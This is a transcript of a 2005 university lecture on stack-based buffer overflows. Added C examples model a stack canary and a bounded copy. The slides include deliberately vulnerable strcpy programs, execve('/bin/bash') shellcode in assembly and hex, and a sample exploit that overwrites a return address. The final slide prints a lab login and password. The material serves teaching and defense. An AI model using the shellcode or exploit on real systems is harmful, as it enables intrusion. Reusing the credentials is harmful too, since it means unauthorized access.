Stack-based buffer overflows - PowerPoint PPT Presentation

About This Presentation

Title: Stack-based buffer overflows

Description: March 22, 2005 - 19. Conclusion. Follow 'Gera's Insecure Programming by example': http://community.corest.com/~gera/InsecureProgramming ... – PowerPoint PPT presentation

Slides: 20
Provided by: A83107

Transcript and Presenter's Notes

1
Stack-based buffer overflows
  • Yves Younan
  • DistriNet, Department of Computer Science
  • Katholieke Universiteit Leuven
  • Belgium
  • Yves.Younan@cs.kuleuven.ac.be

2
Overview
  • Introduction
  • Buffer overflows
  • Stack-based buffer overflows
  • Shellcode
  • Code injection
  • Conclusion

3
Introduction
  • Buffer overflows write outside the boundaries of an array
  • Can be used to overwrite adjacent memory
  • The stack contains control-flow-related data, e.g. return addresses
  • Overwriting this data allows an attacker to execute new or existing code

5
Buffer overflows (on IA32)
    #include <string.h>

    int main(int argc, char *argv[])
    {
        int a;
        char buf[100];
        strcpy(buf, argv[1]);
    }

  • int a is allocated on the stack: 4 bytes
  • buf has memory allocated for 100 chars: 100 bytes
  • argv[1] could be larger than that, allowing an attacker to overwrite a in this example

6
Buffer overflow on IA32
    High addr
      int a
      char buf[100]
    Low addr

8
Stack-based buffer overflows
    #include <string.h>

    void f1(char *a)
    {
        char buffer[100];
        strcpy(buffer, a);
    }

    void f0(char *b)
    {
        f1(b);
    }

9
Stack-based buffer overflows
    Stack (high addresses at the top, low addresses at the bottom)

    High addr
      +-------------------------+
      | Return address f0       |  \
      | Saved Frame Ptr f0      |   } Stack frame f0
      | Local variables f0      |  /
      | Arguments f1            |  pushed by f0, then "call f1"
      +-------------------------+
      | Return address f1       |  \  <- overflow() overwrites this with the address of buffer
      | Saved Frame Ptr f1      |   } Stack frame f1
      | buffer                  |  /  <- Injected code is placed here
      +-------------------------+
    Low addr

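The frame on slide 9 shows why the return address is reachable: it sits a fixed distance above the buffer, and a copy that runs past the buffer's end walks upward into it. The added C example below (my own illustration, not the slides' code) models that frame as a struct so the layout is fixed, and places a guard word between the buffer and the control data, which is the idea behind a compiler stack protector such as gcc's -fstack-protector. The struct, the guard and placeholder values, and the function names are assumptions made for the illustration; a real compiler frame is not a C struct.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the f1 frame on slide 9: buffer, then (towards higher addresses)
 * the saved frame pointer and the return address. The guard word between
 * them is set on entry and checked before return, as a stack protector does.
 * Added illustration: struct, names and values are constructed, not the slides'. */
struct frame_model {
    char     buffer[100];
    uint32_t guard;            /* canary: between buffer and control data */
    uint32_t saved_frame_ptr;
    uint32_t return_address;
};

#define GUARD_VALUE     0xA5C3F00Du   /* constructed constant, not a real canary */
#define RET_PLACEHOLDER 0x08048400u   /* constructed placeholder return address */

/* Emulates a strcpy-style copy of `len` bytes into the frame starting at buffer.
 * Writing through a byte pointer to the whole struct keeps the access inside one
 * object, so it is well defined even when len exceeds sizeof buffer.
 * Returns 0 if the guard survived, -1 if it was clobbered (what the protector's
 * check before `ret` would catch), -2 if len would leave the model entirely. */
int copy_into_frame(struct frame_model *f, const unsigned char *src, size_t len)
{
    if (f == NULL || src == NULL || len > sizeof *f)
        return -2;
    f->guard = GUARD_VALUE;
    f->saved_frame_ptr = 0xbffff000u;   /* constructed placeholder */
    f->return_address = RET_PLACEHOLDER;
    memcpy((unsigned char *)f, src, len);
    return f->guard == GUARD_VALUE ? 0 : -1;
}

/* Copies `len` filler bytes into a fresh frame (the way an overlong argument
 * reaches strcpy in f1). Returns 0 if the copy fit in buffer, 1 if the guard
 * check caught an overflow, -2 if len exceeds the model. */
int overflow_outcome(size_t len)
{
    unsigned char filler[sizeof(struct frame_model)];
    struct frame_model f;
    if (len > sizeof filler)
        return -2;
    memset(filler, 'A', sizeof filler);   /* constructed input: plain filler bytes */
    int rc = copy_into_frame(&f, filler, len);
    if (rc == -2)
        return -2;
    return rc == -1 ? 1 : 0;
}

/* Returns 1 if a copy of `len` filler bytes changed the saved return address.
 * With this layout any such write must first cross the guard, so the guard
 * trips at a smaller len than the one that reaches the return address. */
int return_address_reached(size_t len)
{
    unsigned char filler[sizeof(struct frame_model)];
    struct frame_model f;
    if (len > sizeof filler)
        return -2;
    memset(filler, 'A', sizeof filler);
    copy_into_frame(&f, filler, len);
    return f.return_address != RET_PLACEHOLDER;
}

int main(void)
{
    size_t lens[] = { 50, 100, 101, 108, 109, 112, 113 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("len %3zu: outcome %d, return address touched %d\n",
               lens[i], overflow_outcome(lens[i]), return_address_reached(lens[i]));
    return 0;
}
```

In the model, buffer is 100 bytes and the guard occupies the next 4, so the 101st byte written already trips the check, while the return address is not touched until the 109th byte. That ordering is the whole value of a canary: the check fires before the corrupted control data is used.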
11
Shellcode
  • Code to execute once the return address has been overwritten
  • Usually inserted into the buffer that is used to overflow
  • Some subtleties: a NULL byte will terminate a strcpy, '\n' will terminate gets

12
Example code
    #include <unistd.h>

    int main()
    {
        char *argv[2];
        argv[0] = "/bin/bash";
        argv[1] = 0;
        execve(argv[0], argv, 0);
    }

13
Example transformed to assembly
    .type main,@function
    main:
        push $0x68          # Place h on the stack.
        push $0x7361622f    # Place sab/ on the stack.
        push $0x6e69622f    # Place nib/ on the stack.
        mov %esp,%ebx       # Copy the pointer to /bin/bash to ebx.
        xor %edx,%edx       # Empty edx.
        push %edx           # Place a NULL on the stack to terminate the argv.
        push %ebx           # Place the pointer to /bin/bash on the stack.
        mov %esp,%ecx       # Copy the pointer to the pointer to /bin/bash into ecx.
        mov $0xb,%eax       # Let the syscall know we want execve.
        int $0x80           # Do the system call.

14
Shellcode
    (gdb) x/27b main
    0x8048308 <main>:     0x6a 0x68 0x68 0x2f 0x62 0x61 0x73 0x68
    0x8048310 <main+8>:   0x2f 0x62 0x69 0x6e 0x89 0xe3 0x31 0xd2
    0x8048318 <main+16>:  0x52 0x53 0x89 0xe1 0xb8 0x0b 0x00 0x00
    0x8048320 <main+24>:  0x00 0xcd 0x80

15
Shellcode
    .globl main
    .type main,@function
    main:
        push $0x68
        push $0x7361622f
        push $0x6e69622f
        mov %esp,%ebx
        xor %edx,%edx
        push %edx
        push %ebx
        mov %esp,%ecx
        xor %eax,%eax       # set eax to 0
        mov $0xb,%al        # copy 0xb into al (least significant byte of eax)
        int $0x80

17
Sample vulnerable program
    #include <string.h>

    void function(int a, char *b)
    {
        char string1[10];
        char string2[50];
        strcpy(string2, b);
    }

    int main(int argc, char *argv[])
    {
        function(1, argv[1]);
    }
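Slides 5, 8 and 17 all have the same defect: strcpy copies until it finds a NUL, with no knowledge of the destination size. The added C example below (mine, not the slides' code) keeps the locals of slide 17's function() but replaces the unbounded copy with a length-checked one that rejects input that does not fit, so an overlong argument never reaches the saved frame pointer or return address above string2. The names bounded_copy, function_fixed and demo_boundary, and the constructed inputs, are assumptions made for the illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example; names are mine, not from the slides. */

/* Copy src into dst[dst_size] only if it fits, terminator included.
 * Returns 0 on success; -1 if src is too long, in which case dst is left as
 * an empty string and nothing past it is written. Rejecting is preferred over
 * silently truncating: a truncated path or command may still be a valid, but
 * different, value. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    /* Scan at most dst_size bytes of src, so an unterminated or huge input
     * cannot make this loop read arbitrarily far. */
    size_t n = 0;
    while (n < dst_size && src[n] != '\0')
        n++;
    if (n == dst_size) {            /* no room left for the NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);        /* n + 1 <= dst_size, includes the NUL */
    return 0;
}

/* Same locals as slide 17's function(); the unbounded strcpy is replaced.
 * Returns the number of bytes copied into string2, or -1 if b was rejected. */
int function_fixed(int a, const char *b)
{
    char string1[10];
    char string2[50];
    (void)a;
    string1[0] = '\0';
    if (bounded_copy(string2, sizeof string2, b) != 0)
        return -1;                  /* overlong input never touches the frame above string2 */
    return (int)strlen(string2);
}

/* Exercises the boundary with a constructed run of `len` 'A' bytes:
 * 49 fit into string2[50], 50 or more do not. */
int demo_boundary(size_t len)
{
    char input[256];
    if (len >= sizeof input)
        return -2;
    memset(input, 'A', len);
    input[len] = '\0';
    return function_fixed(1, input);
}

int main(int argc, char *argv[])
{
    if (argc > 1)                   /* same calling shape as the slide's main */
        printf("argv[1]: %d\n", function_fixed(1, argv[1]));
    printf("49 bytes: %d\n", demo_boundary(49));   /* 49 */
    printf("50 bytes: %d\n", demo_boundary(50));   /* -1 */
    return 0;
}
```

The same bounded_copy drops into the slide 5 and slide 8 snippets unchanged: pass sizeof buf or sizeof buffer as dst_size and act on the -1 instead of continuing with a partially filled buffer.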

18
Sample exploit
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    char shellcode[] = "\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89"
                       "\xe3\x31\xd2\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80";

    #define ADDR 0xbffffe2c

    int main()
    {
        char overflow[72];
        char *argv[3] = { "./bufferoverflow", overflow, NULL };
        memset(overflow, '\x90', 72);                 // fill with NOPs
        *(long *)&overflow[68] = ADDR;                // replace ret. addr.
        memcpy(overflow, shellcode, strlen(shellcode));
        execve(argv[0], argv, 0);                     // exec program
    }

19
Conclusion
  • Follow Gera's Insecure Programming by example
  • http://community.corest.com/~gera/InsecureProgramming/
  • Login/pass for the computers: cstudy/distrinet